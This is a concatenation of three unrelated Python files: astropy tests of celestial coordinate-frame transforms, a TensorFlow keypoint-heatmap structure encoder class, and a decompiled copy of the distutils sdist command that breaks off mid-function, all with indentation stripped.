gframe3 = GCRS(obsgeoloc=[385000., 0, 0]*u.km, obsgeovel=[1, 0, 0]*u.km/u.s)
gcrscoo6 = icoo.transform_to(gframe3) # should be different
assert not allclose(gcrscoo.ra, gcrscoo6.ra, rtol=1e-8, atol=1e-10*u.deg)
assert not allclose(gcrscoo.dec, gcrscoo6.dec, rtol=1e-8, atol=1e-10*u.deg)
icooviag3 = gcrscoo6.transform_to(ICRS) # and now back to the original
assert_allclose(icoo.ra, icooviag3.ra)
assert_allclose(icoo.dec, icooviag3.dec)
@pytest.mark.parametrize('gframe', gcrs_frames)
def test_icrs_gcrs_dist_diff(gframe):
"""
Check that with and without distance give different ICRS<->GCRS answers
"""
gcrsnod = icrs_coords[0].transform_to(gframe)
gcrswd = icrs_coords[1].transform_to(gframe)
# parallax effects should be included, so with and w/o distance should be different
assert not allclose(gcrswd.ra, gcrsnod.ra, rtol=1e-8, atol=1e-10*u.deg)
assert not allclose(gcrswd.dec, gcrsnod.dec, rtol=1e-8, atol=1e-10*u.deg)
# and the distance should transform at least somehow
assert not allclose(gcrswd.distance, icrs_coords[1].distance, rtol=1e-8,
atol=1e-10*u.pc)
def test_cirs_to_altaz():
"""
Check the basic CIRS<->AltAz transforms. More thorough checks implicitly
happen in `test_iau_fullstack`
"""
from .. import EarthLocation
ra, dec, dist = randomly_sample_sphere(200)
cirs = CIRS(ra=ra, dec=dec, obstime='J2000')
crepr = SphericalRepresentation(lon=ra, lat=dec, distance=dist)
cirscart = CIRS(crepr, obstime=cirs.obstime, representation=CartesianRepresentation)
loc = EarthLocation(lat=0*u.deg, lon=0*u.deg, height=0*u.m)
altazframe = AltAz(location=loc, obstime=Time('J2005'))
cirs2 = cirs.transform_to(altazframe).transform_to(cirs)
cirs3 = cirscart.transform_to(altazframe).transform_to(cirs)
# check round-tripping
assert_allclose(cirs.ra, cirs2.ra)
assert_allclose(cirs.dec, cirs2.dec)
assert_allclose(cirs.ra, cirs3.ra)
assert_allclose(cirs.dec, cirs3.dec)
def test_gcrs_itrs():
"""
Check basic GCRS<->ITRS transforms for round-tripping.
"""
ra, dec, _ = randomly_sample_sphere(200)
gcrs = GCRS(ra=ra, dec=dec, obstime='J2000')
gcrs6 = GCRS(ra=ra, dec=dec, obstime='J2006')
gcrs2 = gcrs.transform_to(ITRS).transform_to(gcrs)
gcrs6_2 = gcrs6.transform_to(ITRS).transform_to(gcrs)
assert_allclose(gcrs.ra, gcrs2.ra)
assert_allclose(gcrs.dec, gcrs2.dec)
assert not allclose(gcrs.ra, gcrs6_2.ra)
assert not allclose(gcrs.dec, gcrs6_2.dec)
# also try with the cartesian representation
gcrsc = gcrs.realize_frame(gcrs.data)
gcrsc.representation = CartesianRepresentation
gcrsc2 = gcrsc.transform_to(ITRS).transform_to(gcrsc)
assert_allclose(gcrsc.spherical.lon.deg, gcrsc2.ra.deg)
assert_allclose(gcrsc.spherical.lat, gcrsc2.dec)
def test_cirs_itrs():
"""
Check basic CIRS<->ITRS transforms for round-tripping.
"""
ra, dec, _ = randomly_sample_sphere(200)
cirs = CIRS(ra=ra, dec=dec, obstime='J2000')
cirs6 = CIRS(ra=ra, dec=dec, obstime='J2006')
cirs2 = cirs.transform_to(ITRS).transform_to(cirs)
cirs6_2 = cirs6.transform_to(ITRS).transform_to(cirs) # different obstime
# just check round-tripping
assert_allclose(cirs.ra, cirs2.ra)
assert_allclose(cirs.dec, cirs2.dec)
assert not allclose(cirs.ra, cirs6_2.ra)
assert not allclose(cirs.dec, cirs6_2.dec)
def test_gcrs_cirs():
"""
Check GCRS<->CIRS transforms for round-tripping. More complicated than the
above two because it's multi-hop
"""
ra, dec, _ = randomly_sample_sphere(200)
gcrs = GCRS(ra=ra, dec=dec, obstime='J2000')
gcrs6 = GCRS(ra=ra, dec=dec, obstime='J2006')
gcrs2 = gcrs.transform_to(CIRS).transform_to(gcrs)
gcrs6_2 = gcrs6.transform_to(CIRS).transform_to(gcrs)
assert_allclose(gcrs.ra, gcrs2.ra)
assert_allclose(gcrs.dec, gcrs2.dec)
assert not allclose(gcrs.ra, gcrs6_2.ra)
assert not allclose(gcrs.dec, gcrs6_2.dec)
# now try explicit intermediate pathways and ensure they're all consistent
gcrs3 = gcrs.transform_to(ITRS).transform_to(CIRS).transform_to(ITRS).transform_to(gcrs)
assert_allclose(gcrs.ra, gcrs3.ra)
assert_allclose(gcrs.dec, gcrs3.dec)
gcrs4 = gcrs.transform_to(ICRS).transform_to(CIRS).transform_to(ICRS).transform_to(gcrs)
assert_allclose(gcrs.ra, gcrs4.ra)
assert_allclose(gcrs.dec, gcrs4.dec)
def test_gcrs_altaz():
"""
Check GCRS<->AltAz transforms for round-tripping. Has multiple paths
"""
from .. import EarthLocation
ra, dec, _ = randomly_sample_sphere(1)
gcrs = GCRS(ra=ra[0], dec=dec[0], obstime='J2000')
# check array times sure N-d arrays work
times = Time(np.linspace(2456293.25, 2456657.25, 51) * u.day,
format='jd', scale='utc')
loc = EarthLocation(lon=10 * u.deg, lat=80. * u.deg)
aaframe = AltAz(obstime=times, location=loc)
aa1 = gcrs.transform_to(aaframe)
aa2 = gcrs.transform_to(ICRS).transform_to(CIRS).transform_to(aaframe)
aa3 = gcrs.transform_to(ITRS).transform_to(CIRS).transform_to(aaframe)
# make sure they're all consistent
assert_allclose(aa1.alt, aa2.alt)
assert_allclose(aa1.az, aa2.az)
assert_allclose(aa1.alt, aa3.alt)
assert_allclose(aa1.az, aa3.az)
def test_precessed_geocentric():
assert PrecessedGeocentric().equinox.jd == Time('J2000', scale='utc').jd
gcrs_coo = GCRS(180*u.deg, 2*u.deg, distance=10000*u.km)
pgeo_coo = gcrs_coo.transform_to(PrecessedGeocentric)
assert np.abs(gcrs_coo.ra - pgeo_coo.ra) > 10*u.marcsec
assert np.abs(gcrs_coo.dec - pgeo_coo.dec) > 10*u.marcsec
assert_allclose(gcrs_coo.distance, pgeo_coo.distance)
gcrs_roundtrip = pgeo_coo.transform_to(GCRS)
assert_allclose(gcrs_coo.ra, gcrs_roundtrip.ra)
assert_allclose(gcrs_coo.dec, gcrs_roundtrip.dec)
assert_allclose(gcrs_coo.distance, gcrs_roundtrip.distance)
pgeo_coo2 = gcrs_coo.transform_to(PrecessedGeocentric(equinox='B1850'))
assert np.abs(gcrs_coo.ra - pgeo_coo2.ra) > 1.5*u.deg
assert np.abs(gcrs_coo.dec - pgeo_coo2.dec) > 0.5*u.deg
assert_allclose(gcrs_coo.distance, pgeo_coo2.distance)
gcrs2_roundtrip = pgeo_coo2.transform_to(GCRS)
assert_allclose(gcrs_coo.ra, gcrs2_roundtrip.ra)
assert_allclose(gcrs_coo.dec, gcrs2_roundtrip.dec)
assert_allclose(gcrs_coo.distance, gcrs2_roundtrip.distance)
# shared by parametrized tests below. Some use the whole AltAz, others use just obstime
totest_frames = [AltAz(location=EarthLocation(-90*u.deg, 65*u.deg),
obstime=Time('J2000')), # J2000 is often a default so this might work when others don't
AltAz(location=EarthLocation(120*u.deg, -35*u.deg),
obstime=Time('J2000')),
AltAz(location=EarthLocation(-90*u.deg, 65*u.deg),
obstime=Time('2014-01-01 00:00:00')),
AltAz(location=EarthLocation(-90*u.deg, 65*u.deg),
obstime=Time('2014-08-01 08:00:00')),
AltAz(location=EarthLocation(120*u.deg, -35*u.deg),
obstime=Time('2014-01-01 00:00:00'))
]
MOONDIST = 385000*u.km # approximate moon semi-major orbit axis of moon
MOONDIST_CART = CartesianRepresentation(3**-0.5*MOONDIST, 3**-0.5*MOONDIST, 3**-0.5*MOONDIST)
EARTHECC = 0.017 + 0.005 # roughly earth orbital eccentricity, but with an added tolerance
@pytest.mark.parametrize('testframe', totest_frames)
def test_gcrs_altaz_sunish(testframe):
"""
Sanity-check that the sun is at a reasonable distance from any altaz
"""
sun = get_sun(testframe.obstime)
assert sun.frame.name == 'gcrs'
# the .to(u.au) is not necessary, it just makes the asserts on failure more readable
assert (EARTHECC - 1)*u.au < sun.distance.to(u.au) < (EARTHECC + 1)*u.au
sunaa = sun.transform_to(testframe)
assert (EARTHECC - 1)*u.au < sunaa.distance.to(u.au) < (EARTHECC + 1)*u.au
@pytest.mark.parametrize('testframe', totest_frames)
def test_gcrs_altaz_moonish(testframe):
"""
Sanity-check that an object resembling the moon goes to the right place with
a GCRS->AltAz transformation
"""
moon = GCRS(MOONDIST_CART, obstime=testframe.obstime)
moonaa = moon.transform_to(testframe)
# now check that the distance change is similar to earth radius
assert 1000*u.km < np.abs(moonaa.distance - moon.distance).to(u.au) < 7000*u.km
# now check that it round-trips
moon2 = moonaa.transform_to(moon)
assert_allclose(moon.cartesian.xyz, moon2.cartesian.xyz)
# also should add checks that the alt/az are different for different earth locations
@pytest.mark.parametrize('testframe', totest_frames)
def test_gcrs_altaz_bothroutes(testframe):
"""
Repeat of both the moonish and sunish tests above to make sure the two
routes through the coordinate graph are consistent with each other
"""
sun = get_sun(testframe.obstime)
sunaa_viaicrs = sun.transform_to(ICRS).transform_to(testframe)
sunaa_viaitrs = sun.transform_to(ITRS(obstime=testframe.obstime)).transform_to(testframe)
moon = GCRS(MOONDIST_CART, obstime=testframe.obstime)
moonaa_viaicrs = moon.transform_to(ICRS).transform_to(testframe)
moonaa_viaitrs = moon.transform_to(ITRS(obstime=testframe.obstime)).transform_to(testframe)
assert_allclose(sunaa_viaicrs.cartesian.xyz, sunaa_viaitrs.cartesian.xyz)
assert_allclose(moonaa_viaicrs.cartesian.xyz, moonaa_viaitrs.cartesian.xyz)
@pytest.mark.parametrize('testframe', totest_frames)
def test_cirs_altaz_moonish(testframe):
"""
Sanity-check that an object resembling the moon goes to the right place with
a CIRS<->AltAz transformation
"""
moon = CIRS(MOONDIST_CART, obstime=testframe.obstime)
moonaa = moon.transform_to(testframe)
assert 1000*u.km < np.abs(moonaa.distance - moon.distance).to(u.km) < 7000*u.km
# now check that it round-trips
moon2 = moonaa.transform_to(moon)
assert_allclose(moon.cartesian.xyz, moon2.cartesian.xyz)
@pytest.mark.parametrize('testframe', totest_frames)
def test_cirs_altaz_nodist(testframe):
"""
Check that a UnitSphericalRepresentation coordinate round-trips for the
CIRS<->AltAz transformation.
"""
coo0 = CIRS(UnitSphericalRepresentation(10*u.deg, 20*u.deg), obstime=testframe.obstime)
# check that it round-trips
coo1 = coo0.transform_to(testframe).transform_to(coo0)
assert_allclose(coo0.cartesian.xyz, coo1.cartesian.xyz)
@pytest.mark.parametrize('testframe', totest_frames)
def test_cirs_icrs_moonish(testframe):
"""
check that something like the moon goes to about the right distance from the
ICRS origin when starting from CIRS
"""
moonish = CIRS(MOONDIST_CART, obstime=testframe.obstime)
moonicrs = moonish.transform_to(ICRS)
assert 0.97*u.au < moonicrs.distance < 1.03*u.au
@pytest.mark.parametrize('testframe', totest_frames)
def test_gcrs_icrs_moonish(testframe):
"""
check that something like the moon goes to about the right distance from the
ICRS origin when starting from GCRS
"""
moonish = GCRS(MOONDIST_CART, obstime=testframe.obstime)
moonicrs = moonish.transform_to(ICRS)
assert 0.97*u.au < moonicrs.distance < 1.03*u.au
@pytest.mark.parametrize('testframe', totest_frames)
def test_icrs_gcrscirs_sunish(testframe):
"""
check that the ICRS barycenter goes to about the right distance from various
~geocentric frames (other than testframe)
"""
# slight offset to avoid divide-by-zero errors
icrs = ICRS(0*u.deg, 0*u.deg, distance=10*u.km)
gcrs = icrs.transform_to(GCRS(obstime=testframe.obstime))
assert (EARTHECC - 1)*u.au < gcrs.distance.to(u.au) < (EARTHECC + 1)*u.au
cirs = icrs.transform_to(CIRS(obstime=testframe.obstime))
assert (EARTHECC - 1)*u.au < cirs.distance.to(u.au) < (EARTHECC + 1)*u.au
itrs = icrs.transform_to(ITRS(obstime=testframe.obstime))
assert (EARTHECC - 1)*u.au < itrs.spherical.distance.to(u.au) < (EARTHECC + 1)*u.au
@pytest.mark.parametrize('testframe', totest_frames)
def test_icrs_altaz_moonish(testframe):
"""
Check that something expressed in *ICRS* as being moon-like goes to the
right AltAz distance
"""
# we use epv00 instead of get_sun because get_sun includes aberration
earth_pv_helio, earth_pv_bary = epv00(*get_jd12(testframe.obstime, 'tdb'))
earth_icrs_xyz = earth_pv_bary[0]*u.au
moonoffset = [0, 0, MOONDIST.value]*MOONDIST.unit
moonish_icrs = ICRS(CartesianRepresentation(earth_icrs_xyz + moonoffset))
moonaa = moonish_icrs.transform_to(testframe)
# now check that the distance change is similar to earth radius
assert 1000*u.km < np.abs(moonaa.distance - MOONDIST).to(u.au) < 7000*u.km
def test_gcrs_self_transform_closeby():
"""
Tests GCRS self transform for objects which are nearby and thus
have reasonable parallax.
Moon positions were originally created using JPL DE432s ephemeris.
The two lunar positions (one geocentric, one at a defined location)
are created via a transformation from ICRS to two different GCRS frames.
We test that the GCRS-GCRS self transform can correctly map one GCRS
frame onto the other.
"""
t = Time("2014-12-25T07:00")
moon_geocentric = SkyCoord(GCRS(318.10579159*u.deg,
-11.65281165*u.deg,
365042.64880308*u.km, obstime=t))
# this is the location of the Moon as seen from La Palma
obsgeoloc = [-5592982.59658935, -63054.1948592, 3059763.90102216]*u.m
obsgeovel = [4.59798494, -407.84677071, 0.]*u.m/u.s
moon_lapalma = SkyCoord(GCRS(318.7048445*u.deg,
-11.98761996*u.deg,
369722.8231031*u.km,
obstime=t,
obsgeoloc=obsgeoloc,
obsgeovel=obsgeovel))
transformed = moon_geocentric.transform_to(moon_lapalma.frame)
delta = transformed.separation_3d(moon_lapalma)
assert_allclose(delta, 0.0*u.m, atol=1*u.m)
@remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
def test_ephemerides():
"""
We test that using different ephemerides gives very similar results
for transformations
"""
t = Time("2014-12-25T07:00")
moon = SkyCoord(GCRS(318.10579159*u.deg,
-11.65281165*u.deg,
365042.64880308*u.km, obstime=t))
icrs_frame = ICRS()
hcrs_frame = HCRS(obstime=t)
ecl_frame = HeliocentricTrueEcliptic(equinox=t)
cirs_frame = CIRS(obstime=t)
moon_icrs_builtin = moon.transform_to(icrs_frame)
moon_hcrs_builtin = moon.transform_to(hcrs_frame)
moon_helioecl_builtin = moon.transform_to(ecl_frame)
moon_cirs_builtin = moon.transform_to(cirs_frame)
with solar_system_ephemeris.set('jpl'):
moon_icrs_jpl = moon.transform_to(icrs_frame)
moon_hcrs_jpl = moon.transform_to(hcrs_frame)
moon_helioecl_jpl = moon.transform_to(ecl_frame)
moon_cirs_jpl = moon.transform_to(cirs_frame)
# most transformations should differ by an amount which is
# non-zero but of order milliarcsecs
sep_icrs = moon_icrs_builtin.separation(moon_icrs_jpl)
sep_hcrs = moon_hcrs_builtin.separation(moon_hcrs_jpl)
sep_helioecl = moon_helioecl_builtin.separation(moon_helioecl_jpl)
sep_cirs = moon_cirs_builtin.separation(moon_cirs_jpl)
assert_allclose([sep_icrs, sep_hcrs, sep_helioecl], 0.0*u.deg, atol=10*u.mas)
assert all(sep > 10*u.microarcsecond for sep in (sep_icrs, sep_hcrs, sep_helioecl))
# CIRS should be the same
assert_allclose(sep_cirs, 0.0*u.deg, atol=1*u.microarcsecond)
|
|
from abc import ABCMeta, abstractmethod
import tensorflow as tf
import prettytensor as pt
import zutils.tf_math_funcs as tmf
import zutils.pt_utils as ptu
import net_modules.auto_struct.utils as asu
from net_modules import keypoints_2d
import math
from zutils.py_utils import *
import zutils.tf_graph_utils as tgu
import collections
class Factory:
__metaclass__ = ABCMeta
def __init__(self, output_channels, options):
"""
:param output_channels: output_channels for the encoding net
"""
self.output_channels = output_channels
self.options = options
self.structure_as_final_class = True
self.target_input_size = None
self.stop_gradient_at_latent_for_structure = False
def __call__(self, input_tensor, condition_tensor=None, extra_inputs=None):
_, _, structure_latent, mos = self.structure_encode(
input_tensor, condition_tensor=condition_tensor, extra_inputs=extra_inputs)
latent_tensor = structure_latent
assert self.output_channels == tmf.get_shape(latent_tensor)[1], \
"wrong output_channels"
return structure_latent, mos.extra_outputs
def input_to_heatmap_overall(self, input_tensor, mos):
# compute shared features
overall_feature = mos(self.image2sharedfeature(input_tensor))
# compute raw heatmap
raw_heatmap = mos(self.image2heatmap(overall_feature))
if "heatmap_extra" in mos.extra_outputs:
heatmap_extra = mos.extra_outputs["heatmap_extra"]
else:
heatmap_extra = None
raw_heatmap = mos(call_func_with_ignored_args(
self.heatmap_postprocess, raw_heatmap, image_tensor=input_tensor, heatmap_extra=heatmap_extra))
if "heatmap_extra" in mos.extra_outputs:
heatmap_extra = mos.extra_outputs["heatmap_extra"]
else:
heatmap_extra = None
# normalize heatmap
heatmap = tf.nn.softmax(raw_heatmap)
heatmap = mos(call_func_with_ignored_args(
self.heatmap_postpostprocess, heatmap, image_tensor=input_tensor, heatmap_extra=heatmap_extra
))
return heatmap, overall_feature
def input_to_heatmap(self, input_tensor, mos, **kwargs):
heatmap, _ = self.input_to_heatmap_overall(input_tensor, mos, **kwargs)
return heatmap
def structure_encode(self, input_tensor, condition_tensor=None, extra_inputs=None):
if "freeze_encoded_structure" in self.options and rbool(self.options["freeze_encoded_structure"]):
with pt.defaults_scope(phase=pt.Phase.test):
return self.structure_encode_(input_tensor, condition_tensor, extra_inputs)
else:
return self.structure_encode_(input_tensor, condition_tensor, extra_inputs)
def structure_encode_(self, input_tensor, condition_tensor=None, extra_inputs=None):
"""Create encoder network.
"""
input_tensor = self.pad_input_tensor(input_tensor)
# module output strip
mos = asu.ModuleOutputStrip()
mos.extra_outputs["discriminator_remark"] = dict(
generator_aux_loss=[]
)
deterministic_collection = tgu.SubgraphCollectionSnapshots()
deterministic_collection.sub_snapshot("_old")
with tf.variable_scope("deterministic"), tf.variable_scope("structure"):
# augment images (if needed)
main_batch_size = tmf.get_shape(input_tensor)[0]
input_tensor_x, aug_cache = mos(self.augment_images(input_tensor))
network_predefined = ("network_predefined" in aug_cache) and aug_cache["network_predefined"]
aug_cache["main_batch_size"] = main_batch_size
mos.extra_outputs["aug_cache"] = aug_cache
with tf.variable_scope("deterministic"):
with tf.variable_scope("structure", reuse=True if network_predefined else None):
heatmap, overall_feature = self.input_to_heatmap_overall(input_tensor_x, mos)
structure_pack = mos(self.heatmap2structure(heatmap))
with tf.variable_scope("structure"):
# postprocess structure
structure_param_x = mos(call_func_with_ignored_args(
self.heatmap2structure_poststep, structure_pack, image_tensor=input_tensor_x
))
# clean up augmented data
structure_param = mos(call_func_with_ignored_args(
self.cleanup_augmentation_structure, structure_param_x, aug_cache=aug_cache,
condition_tensor=condition_tensor
))
with tf.variable_scope("deterministic"), tf.variable_scope("structure"):
mos.extra_outputs["save"]["heatmap"] = heatmap[:main_batch_size]
# entropy loss to encourage heatmap separation across different channels
if "heatmap_separation_loss_weight" in self.options and \
rbool(self.options["heatmap_separation_loss_weight"]):
total_heatmap_entropy = keypoints_2d.keypoint_map_depth_entropy_with_real_bg(heatmap)
separation_loss = total_heatmap_entropy * self.options["heatmap_separation_loss_weight"]
separation_loss.disp_name = "separation"
tgu.add_to_aux_loss(separation_loss)
# register structure_param for storing
mos.extra_outputs["save"]["structure_param"] = structure_param
mos.extra_outputs["for_decoder"]["structure_param"] = structure_param
# structure_param matching
if extra_inputs is not None and "structure_param" in extra_inputs and \
"structure_detection_loss_weight" in self.options and \
rbool(self.options["structure_detection_loss_weight"]):
structure_param_dist = self.structure_param_distance(
extra_inputs["structure_param"], tf.stop_gradient(structure_param))
structure_detection_loss = \
self.options["structure_detection_loss_weight"] * tf.reduce_mean(structure_param_dist, axis=0)
structure_detection_loss.disp_name = "struct_detection"
tgu.add_to_aux_loss(structure_detection_loss)
mos.extra_outputs["discriminator_remark"]["generator_aux_loss"].append(structure_detection_loss)
deterministic_collection.sub_snapshot("structure_deterministic")
encoded_structure_vars = deterministic_collection["structure_deterministic"].get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES)
if "freeze_encoded_structure" in self.options and rbool(self.options["freeze_encoded_structure"]):
tgu.add_to_freeze_collection(encoded_structure_vars)
if "encoded_structure_lr_mult" in self.options and rbool(self.options["encoded_structure_lr_mult"]):
for v in encoded_structure_vars:
v.lr_mult = self.options["encoded_structure_lr_mult"]
with tf.variable_scope("variational"), tf.variable_scope("structure"):
structure_latent = mos(self.structure2latent(structure_param))
if self.structure_as_final_class:
with tf.variable_scope("deterministic"):
# use the main batch only
heatmap = heatmap[:main_batch_size]
overall_feature = overall_feature[:main_batch_size]
return overall_feature, heatmap, structure_latent, mos
def augment_images(self, image_tensor):
return image_tensor
def cleanup_augmentation_structure(self, structure_param, aug_cache, condition_tensor=None):
return structure_param
def image2sharedfeature(self, image_tensor):
return image_tensor
@abstractmethod
def image2heatmap(self, image_tensor):
return None
def heatmap_postprocess(self, heatmap):
return heatmap
def heatmap_postpostprocess(self, heatmap):
return heatmap
def heatmap2structure_poststep(self, structure_pack):
return structure_pack
@abstractmethod
def heatmap2structure(self, heatmap_tensor):
return None
def structure2latent(self, structure_tensor):
# simply copy the structure as latent
input_shape = tmf.get_shape(structure_tensor)
latent_tensor = tf.reshape(structure_tensor, [input_shape[0], -1])
return latent_tensor
def structure_param2euclidean(self, structure_param):
return structure_param
def structure_param_distance(self, p1, p2):
batch_size = tmf.get_shape(p1)[0]
r1 = self.structure_param2euclidean(p1)
r2 = self.structure_param2euclidean(p2)
r1 = tf.reshape(r1, [batch_size, -1])
r2 = tf.reshape(r2, [batch_size, -1])
return tf.reduce_sum(tf.square(r2-r1), axis=1)
def pad_input_tensor(self, input_tensor):
if self.target_input_size is None:
return input_tensor
if (
isinstance(self.target_input_size, collections.Iterable) and
isinstance(self.target_input_size, collections.Sized)
):
assert len(self.target_input_size) == 2, "wrong target_input_size"
final_input_size = self.target_input_size
else:
final_input_size = [self.target_input_size] * 2
init_input_size = tmf.get_shape(input_tensor)[1:3]
assert math.isclose(final_input_size[0]/init_input_size[0], final_input_size[1]/init_input_size[1]), \
"enlarge ratio should be the same (for the simplicity of other implementation)"
assert final_input_size[0] >= init_input_size[0] and final_input_size[1] >= init_input_size[1], \
"target input size should not be smaller the actual input size"
if init_input_size[0] == final_input_size[0] and init_input_size[1] == final_input_size[1]:
return input_tensor
else:
the_pad_y_begin = (final_input_size[0] - init_input_size[0]) // 2
the_pad_x_begin = (final_input_size[1] - init_input_size[1]) // 2
the_padding = [
[0, 0],
[the_pad_y_begin, final_input_size[0] - init_input_size[0] - the_pad_y_begin],
[the_pad_x_begin, final_input_size[1] - init_input_size[1] - the_pad_x_begin],
[0] * 2,
]
paded_input_tensor = tmf.pad(
tensor=input_tensor, paddings=the_padding, mode="MEAN_EDGE",
geometric_axis=[1, 2]
)
return paded_input_tensor
|
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: sdist.py
"""distutils.command.sdist
Implements the Distutils 'sdist' command (create a source distribution)."""
__revision__ = '$Id$'
import os
import string
import sys
from glob import glob
from warnings import warn
from distutils.core import Command
from distutils import dir_util, dep_util, file_util, archive_util
from distutils.text_file import TextFile
from distutils.errors import DistutilsPlatformError, DistutilsOptionError, DistutilsTemplateError
from distutils.filelist import FileList
from distutils import log
from distutils.util import convert_path
def show_formats():
"""Print all possible values for the 'formats' option (used by
the "--help-formats" command-line option).
"""
from distutils.fancy_getopt import FancyGetopt
from distutils.archive_util import ARCHIVE_FORMATS
formats = []
for format in ARCHIVE_FORMATS.keys():
formats.append(('formats=' + format, None,
ARCHIVE_FORMATS[format][2]))
formats.sort()
FancyGetopt(formats).print_help('List of available source distribution formats:')
return
class sdist(Command):
description = 'create a source distribution (tarball, zip file, etc.)'
def checking_metadata(self):
"""Callable used for the check sub-command.
Placed here so user_options can view it"""
return self.metadata_check
user_options = [
('template=', 't', 'name of manifest template file [default: MANIFEST.in]'),
('manifest=', 'm', 'name of manifest file [default: MANIFEST]'),
('use-defaults', None, 'include the default file set in the manifest [default; disable with --no-defaults]'),
('no-defaults', None, "don't include the default file set"),
('prune', None, 'specifically exclude files/directories that should not be distributed (build tree, RCS/CVS dirs, etc.) [default; disable with --no-prune]'),
('no-prune', None, "don't automatically exclude anything"),
('manifest-only', 'o', 'just regenerate the manifest and then stop (implies --force-manifest)'),
('force-manifest', 'f', 'forcibly regenerate the manifest and carry on as usual. Deprecated: now the manifest is always regenerated.'),
('formats=', None, 'formats for source distribution (comma-separated list)'),
(
'keep-temp', 'k',
'keep the distribution tree around after creating ' + 'archive file(s)'),
('dist-dir=', 'd', 'directory to put the source distribution archive(s) in [default: dist]'),
('metadata-check', None, 'Ensure that all required elements of meta-data are supplied. Warn if any missing. [default]'),
('owner=', 'u', 'Owner name used when creating a tar file [default: current user]'),
('group=', 'g', 'Group name used when creating a tar file [default: current group]')]
boolean_options = [
'use-defaults', 'prune',
'manifest-only', 'force-manifest',
'keep-temp', 'metadata-check']
help_options = [
(
'help-formats', None,
'list available distribution formats', show_formats)]
negative_opt = {'no-defaults': 'use-defaults','no-prune': 'prune'
}
default_format = {'posix': 'gztar','nt': 'zip'
}
sub_commands = [
(
'check', checking_metadata)]
def initialize_options(self):
self.template = None
self.manifest = None
self.use_defaults = 1
self.prune = 1
self.manifest_only = 0
self.force_manifest = 0
self.formats = None
self.keep_temp = 0
self.dist_dir = None
self.archive_files = None
self.metadata_check = 1
self.owner = None
self.group = None
return
def finalize_options(self):
if self.manifest is None:
self.manifest = 'MANIFEST'
if self.template is None:
self.template = 'MANIFEST.in'
self.ensure_string_list('formats')
if self.formats is None:
try:
self.formats = [
self.default_format[os.name]]
except KeyError:
raise DistutilsPlatformError, "don't know how to create source distributions " + 'on platform %s' % os.name
bad_format = archive_util.check_archive_formats(self.formats)
if bad_format:
raise DistutilsOptionError, "unknown archive format '%s'" % bad_format
if self.dist_dir is None:
self.dist_dir = 'dist'
return
def run(self):
self.filelist = FileList()
for cmd_name in self.get_sub_commands():
self.run_command(cmd_name)
self.get_file_list()
if self.manifest_only:
return
self.make_distribution()
def check_metadata(self):
"""Deprecated API."""
warn('distutils.command.sdist.check_metadata is deprecated, use the check command instead', PendingDeprecationWarning)
check = self.distribution.get_command_obj('check')
check.ensure_finalized()
check.run()
def get_file_list(self):
"""Figure out the list of files to include in the source
distribution, and put it in 'self.filelist'. This might involve
reading the manifest template (and writing the manifest), or just
reading the manifest, or just using the default file set -- it all
depends on the user's options.
"""
template_exists = os.path.isfile(self.template)
if not template_exists:
self.warn(("manifest template '%s' does not exist " + '(using default file list)') % self.template)
self.filelist.findall()
if self.use_defaults:
self.add_defaults()
if template_exists:
self.read_template()
if self.prune:
self.prune_file_list()
self.filelist.sort()
self.filelist.remove_duplicates()
self.write_manifest()
def add_defaults(self):
"""Add all the default files to self.filelist:
- README or README.txt
- setup.py
- test/test*.py
- all pure Python modules mentioned in setup script
- all files pointed by package_data (build_py)
- all files defined in data_files.
- all files defined as scripts.
- all C sources listed as part of extensions or C libraries
in the setup script (doesn't catch C headers!)
Warns if (README or README.txt) or setup.py are missing; everything
else is optional.
"""
standards = [
('README', 'README.txt'), self.distribution.script_name]
for fn in standards:
if isinstance(fn, tuple):
alts = fn
got_it = 0
for fn in alts:
if os.path.exists(fn):
got_it = 1
self.filelist.append(fn)
break
if not got_it:
self.warn('standard file not found: should have one of ' + string.join(alts, ', '))
elif os.path.exists(fn):
self.filelist.append(fn)
else:
self.warn("standard file '%s' not found" % fn)
optional = [
'test/test*.py', 'setup.cfg']
for pattern in optional:
files = filter(os.path.isfile, glob(pattern))
if files:
self.filelist.extend(files)
build_py = self.get_finalized_command('build_py')
if self.distribution.has_pure_modules():
self.filelist.extend(build_py.get_source_files())
for pkg, src_dir, build_dir, filenames in build_py.data_files:
for filename in filenames:
self.filelist.append(os.path.join(src_dir, filename))
if self.distribution.has_data_files():
for item in self.distribution.data_files:
if isinstance(item, str):
item = convert_path(item)
if os.path.isfile(item):
self.filelist.append(item)
else:
dirname, filenames = item
for f in filenames:
f = convert_path(f)
if os.path.isfile(f):
self.filelist.append(f)
if self.distribution.has_ext_modules():
build_ext = self.get_finalized_command('build_ext')
self.filelist.extend(build_ext.get_source_files())
if self.distribution.has_c_libraries():
build_clib = self.get_finalized_command('build_clib')
self.filelist.extend(build_clib.get_source_files())
if self.distribution.has_scripts():
build_scripts = self.get_finalized_command('build_scripts')
self.filelist.extend(build_scripts.get_source_files())
def read_template(self):
"""Read and parse manifest template file named by self.template.
(usually "MANIFEST.in") The parsing and processing is done by
'self.filelist', which updates itself accordingly.
"""
log.info("reading manifest template '%s'", self.template)
template = TextFile(self.template, strip_comments=1, skip_blanks=1, join_lines=1, lstrip_ws=1, rstrip_ws=1, collapse_join=1)
try:
while 1:
line = template.readline()
if line is None:
break
try:
self.filelist.process_template_line(line)
except DistutilsTemplateError as msg:
self.warn('%s, line %d: %s' % (template.filename,
template.current_line,
msg))
finally:
template.close()
return
def prune_file_list(self):
"""Prune off branches that might slip into the file list as created
by 'read_template()', but really don't belong there:
* the build tree (typically "build")
* the release tree itself (only an issue if we ran "sdist"
previously with --keep-temp, or it aborted)
* any RCS, CVS, .svn, .hg, .git, .bzr, _darcs directories
"""
build = self.get_finalized_command('build')
base_dir = self.distribution.get_fullname()
self.filelist.exclude_pattern(None, prefix=build.build_base)
self.filelist.exclude_pattern(None, prefix=base_dir)
if sys.platform == 'win32':
seps = '/|\\\\'
else:
seps = '/'
vcs_dirs = ['RCS', 'CVS', '\\.svn', '\\.hg', '\\.git', '\\.bzr',
'_darcs']
vcs_ptrn = '(^|%s)(%s)(%s).*' % (seps, '|'.join(vcs_dirs), seps)
self.filelist.exclude_pattern(vcs_ptrn, is_regex=1)
return
def write_manifest(self):
"""Write the file list in 'self.filelist' (presumably as filled in
by 'add_defaults()' and 'read_template()') to the manifest file
named by 'self.manifest'.
"""
